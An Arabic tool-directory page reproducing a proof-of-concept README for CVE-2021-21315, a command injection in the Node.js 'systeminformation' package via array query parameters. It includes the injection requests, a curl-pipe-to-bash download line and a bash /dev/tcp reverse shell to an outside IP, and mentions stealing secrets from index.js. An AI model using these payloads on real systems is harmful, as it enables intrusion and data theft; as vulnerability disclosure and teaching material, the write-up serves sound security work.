Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-21315-PoC — CVE 2021-21315 إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/forbiddenprogrammer/cve-2021-21315-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubforbiddenprogrammer/cve-2021-21315-poc

CVE-2021-21315-PoC

CVE 2021-21315 إثبات المفهوم

عرض المستودع
160252منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-21315-systeminformation

هذا هو إثبات المفهوم لـ CVE-2021-21315 الذي يؤثر على مكتبة معلومات النظام لـ Node.JS (حزمة npm "systeminformation"). npmjs.com/systeminformation

"تأكد من فحص أو تعقيم معاملات الخدمة التي يتم تمريرها إلى si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... اسمح بالسلاسل النصية فقط، وارفض أي مصفوفات. تعقيم السلاسل النصية يعمل كما هو متوقع."

نظرًا لأن الثغرة غير موضحة جيدًا (في رأيي)، قررت برمجة تطبيق صغير يعتمد على إصدار ضعيف من systeminformation. يحتوي إثبات المفهوم على:

  1. تطبيق اختبار مصنوع بـ Node.js، باستخدام express و systeminformation الضعيفة
  2. حمولة اختبار بسيطة لإنشاء ملف .txt على الجهاز المتأثر

خطوات إعادة الإنتاج:

  1. قم بتشغيل التطبيق على بيئة خادم Linux
  2. أرسل طلب GET إلى site.com/api/getServices?name=nginx (nginx مجرد مثال) obraz
  3. الآن حاول إرسال طلب كهذا: yoursite.com/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt) obraz

سيفشل هذا بسبب تعقيم السلاسل النصية: obraz

كما ورد في تفاصيل CVE "تعقيم السلاسل يعمل كما هو متوقع، ارفض أي مصفوفات [...]"

  1. الآن حاول إرسال طلب: yoursite.com/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt) obraz هذه المرة، إذا ألقيت نظرة على قيمة "name"، لم تكن معقمة - نجاح! دعنا نرى ما إذا كان الأمر قد نُفذ

obraz

نجاح! تم تنفيذ أمرنا. بالطبع لا أحد يهتم بـ "pwn.txt"، لكن المهاجم المحتمل يمكنه:

  1. رفع الملفات الداخلية، مثل index.js (جوهر تطبيقنا، مع مفاتيح API المحتملة وسلسلة اتصال قاعدة البيانات وغيرها) أو غيرها
  2. تنزيل وتنفيذ السكربتات - curl -s http://server/path/script.sh | bash /dev/stdin arg1 arg2
  3. قشرة عكسية - bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
  4. قتل العمليات (يمكنك قتل تطبيق Node.js الاختباري الخاص بنا أيضًا)
  5. أشياء أكثر شرًا....

"حقن الأوامر" قد يبدو بريئًا، لكنه قد يكون له تأثير هائل إذا تحققت شروط معينة

تم إصلاح المشكلة في الإصدار 5.3.1 من "systeminformation" الفضل يعود إلى https://www.huntr.dev/users/EffectRenan (لقد وجد الثغرة، لكن في رأيي، لم يُظهر "إثبات المفهوم" الخاص به تأثيرًا حقيقيًا في العالم الواقعي)

أيضًا، لا تتردد في استخدام إثبات المفهوم هذا في بعض مسابقات CTF، لكن سيكون رائعًا إذا قمت بنسب الفضل لمكتشف الثغرة - EffectRean ومنشئ إثبات المفهوم - أنا، تحياتي!

إخلاء مسؤولية

يمكن استخدام هذا المشروع للأغراض التعليمية فقط. استخدام هذا البرنامج ضد الأنظمة المستهدفة دون إذن مسبق غير قانوني، ولن يتحمل المؤلف أي أضرار ناتجة عن إساءة استخدام هذا البرنامج.

تنزيل الأداة